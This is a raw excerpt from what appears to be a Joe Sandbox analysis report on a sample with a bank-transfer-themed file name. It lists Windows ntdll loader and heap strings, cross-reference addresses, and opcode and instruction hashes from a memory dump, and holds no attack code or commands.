                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  Strings
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                  • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                  • .Local, xrefs: 010F28D8
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  Strings
                                  • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  Strings
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                  • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                  • apphelp.dll, xrefs: 010E2462
                                  • LdrpDynamicShimModule, xrefs: 0112A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  Strings
                                  • HEAP: , xrefs: 010D3264
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                  • HEAP[%wZ]: , xrefs: 010D3255
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  Strings
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: $@
                                  • API String ID: 2994545307-1077428164
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                  • LdrpCheckModule, xrefs: 0112A117
                                  • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                  • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  Strings
                                  • @, xrefs: 0117C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                  • PreferredUILanguages, xrefs: 0117C212
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  Strings
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                  • LdrpCheckRedirection, xrefs: 0114488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                  • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                  • LdrpInitializationFailure, xrefs: 011420FA
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                  • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                  • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                  • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                  Strings
                                  • LdrResSearchResource Enter, xrefs: 010CAA13
                                  • LdrResSearchResource Exit, xrefs: 010CAA25
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                  • Instruction ID: 70d94841659b730bec1a30ed286aac50e4a58d25ed51cb2d01582d3113247a83
                                  • Opcode Fuzzy Hash: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                  • Instruction Fuzzy Hash: 7AE18F71F00219DBEB268F9CC980BEEBBB9BF08B14F10446AE951E7251E7389950CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: 47fd6e9ece10615d61f618517d0302b816589588daa414ac2d7d8196c822d06d
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: A4C1F4312043429BEB28EF28D841B6BBBE5AFC4318F188A2EF695C7290D775D545CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                  • Instruction ID: 45f5a658a4b1e8fc0ac98f4bcbbb0dbfd6995dd3265eeacf7bfe3a1195a7ff9f
                                  • Opcode Fuzzy Hash: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                  • Instruction Fuzzy Hash: FE615E71E017199FDB19DFA8C850BAEBBB5FF88704F14406DE649EB295D731A900CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                  • Instruction ID: 6b79e5a6b4c977f6c8b859f2e3e4ddc8a1a16a244ba6d8f9742465b3e75f9e67
                                  • Opcode Fuzzy Hash: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                  • Instruction Fuzzy Hash: C05137B1E0021DAEDF15DFA9CC84AEEBBBCEB48754F100529E611B7690D7719E05CBA0
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                  • kLsE, xrefs: 010C0540
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  • Opcode ID: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                  • Instruction ID: 18b6a7f5d3ae61f8aa56bb79816020e459a7ab4307c6efcda3bb601658ac7759
                                  • Opcode Fuzzy Hash: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                  • Instruction Fuzzy Hash: 0D51CE79600742CFD724DF78C5806ABBBE4AF88B04F10893EE6EA87245E7709545CF92
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                  • Instruction ID: ac2f5d4592d7f96ba14d1f86da039c069ef42265f3cf17d90708a887ed2af744
                                  • Opcode Fuzzy Hash: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                  • Instruction Fuzzy Hash: 9141BE71B04659DBDB29CF69C850BAE7BB4FF84B00F1480A9E980DB291E3B5D900CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                  • Instruction ID: 773ea0b06412ec3e20d90356f18b5c44c621dd90354b3fb671b508c44c95cd9d
                                  • Opcode Fuzzy Hash: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                  • Instruction Fuzzy Hash: 5D01ADB2650700EFE312DF24CD46B1677E8E798715F00893DA69CCB590E374D804CB46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                  • Instruction ID: 21573ce60807c725f4a3380a88c5e53885531c6403465079367aa33d3c582e30
                                  • Opcode Fuzzy Hash: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                  • Instruction Fuzzy Hash: 8B825D75E002198FEB65CFA9C980BEDBBB1BF48B10F1481ADE999AB251D7309D41CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                  • Instruction ID: d668f6eb27cb9769617bfcfde7eb06ca33bb8f1f4b267a98baac92d5adcbb3d5
                                  • Opcode Fuzzy Hash: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                  • Instruction Fuzzy Hash: 929184B1A40219AFEB25DF95CD85FEEBBB8EF59B54F104065F600AB190D774AD00CBA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                  • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                  • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                  • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                  • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                  • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                  • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  • Opcode ID: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                  • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
                                  • Opcode Fuzzy Hash: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                  • Instruction Fuzzy Hash: AA419E72608312ABD751DA75C884BAFBBE8BF88B14F45096DFAC4DB180E774D904C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AlternateCodePage
                                  • API String ID: 0-3889302423
                                  • Opcode ID: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                  • Instruction ID: b882abdd69a6375e2f7a97e3dcdb4137282613ad1e18789ced7201ad5ccf81a7
                                  • Opcode Fuzzy Hash: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                  • Instruction Fuzzy Hash: 5A41D172D01249EAEF29DB98DC80AEEFBF8FF84310F14416AE511E7254D7709A41CB51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                  • Instruction ID: 976d51aa8205205cb597d28f88f1212561457f00fbfb9268ad755d3807166233
                                  • Opcode Fuzzy Hash: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                  • Instruction Fuzzy Hash: 574121B1D0062DAADB25DA50CC84FDEB77CAB54718F0045E6EB08BB144DB709E898FE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  • Opcode ID: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                  • Instruction ID: 9700e758265586b6475a00e9d0ad1352cf2e1033a5e808ccb8f0d72b21f10a0e
                                  • Opcode Fuzzy Hash: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                  • Instruction Fuzzy Hash: 6E312A31F00709DBEB2ADB69C850BEE7BB8DF55704F944028ED60AB282C775D905CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                  • Instruction ID: 74afc80bf5c2dc6c1ac73ded271ccf62d3f58110f6f5d43137b42a7db675c27f
                                  • Opcode Fuzzy Hash: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                  • Instruction Fuzzy Hash: 0B31E576900519AFEB1EDB59C855FAFBB74EBC0790F01412AE905B7254D7309E04DBE0
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  • Opcode ID: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                  • Instruction ID: 43ff17aa30f112ab497cf6f89aa2b4e9d0a9bf64f22701490adc86b68a8ef438
                                  • Opcode Fuzzy Hash: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                  • Instruction Fuzzy Hash: 7F012B39211A06DFEA2D6F95DCC4B9A7F66EFC5E94B08002CF78116151DB206C81C793
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction ID: b45d93123d6653b894515795e6d482afe0730e4a673d77a7e20dd12e960f137a
                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction Fuzzy Hash: 91B10531600756AFDB19DB68C890BBFBBF6AF84300F150199E6969B385D734E941CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                  • Instruction ID: 2dc41bc75b561d39ff04b487ab7af25bc02d377d674d8a6822ff7467ad24d794
                                  • Opcode Fuzzy Hash: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                  • Instruction Fuzzy Hash: B1C156742083419FD764CF19C494BAFB7E4BF98704F44896EE98987291D7B4E908CF92
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                  • Instruction ID: c53d5fc875ac65c5957777ff29c8a28ed864164e6d3a189a0eb1b88b7758409c
                                  • Opcode Fuzzy Hash: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                  • Instruction Fuzzy Hash: 97B18270A002668BEB65CF58C990BEDB7F5EF44704F0485EAD58AE7281EB709DC5CB21
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                  • Instruction ID: d5f086871d93cba70ada871201e7f9ed0636e291425835ec1a0f4e0c96751468
                                  • Opcode Fuzzy Hash: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                  • Instruction Fuzzy Hash: B0A14531E0062A9FEB2ADB59C848FAEBBF4FB04754F050161EA90AB2D0D7749D51CBD1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                  • Instruction ID: 4888dc9bea8135307e9f5c6b455e99309ee14bef968abb898589ed03ce7bc9ea
                                  • Opcode Fuzzy Hash: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                  • Instruction Fuzzy Hash: 51A1C070F0161A9FDB2EDF69C990BAAB7A1FF48358F014029EA45D72C1DBB4E815CB40
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                  • Instruction ID: c64e8209d65ddf529947a66fd636534335f467ef9f75665f992f32f015490613
                                  • Opcode Fuzzy Hash: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                  • Instruction Fuzzy Hash: 2DA1D072A14612DFDB29DF58CA80B5AB7E9FF58704F050528F5A5DBA50C334EC42CB92
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                  • Instruction ID: a42cfa15e71f5ce8571074c5ad89e917275e5906d79dc6b62551e2bc499929c1
                                  • Opcode Fuzzy Hash: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                  • Instruction Fuzzy Hash: 7391C471E04216AFDF19CFA8D894BAEBFB5AF4AB14F154169E614EB340D734D900CBA0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                  • Instruction ID: fd96bd2fec8d34e0ecd02eef350f0cb6df179d613694fd144f45a7ce97648433
                                  • Opcode Fuzzy Hash: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
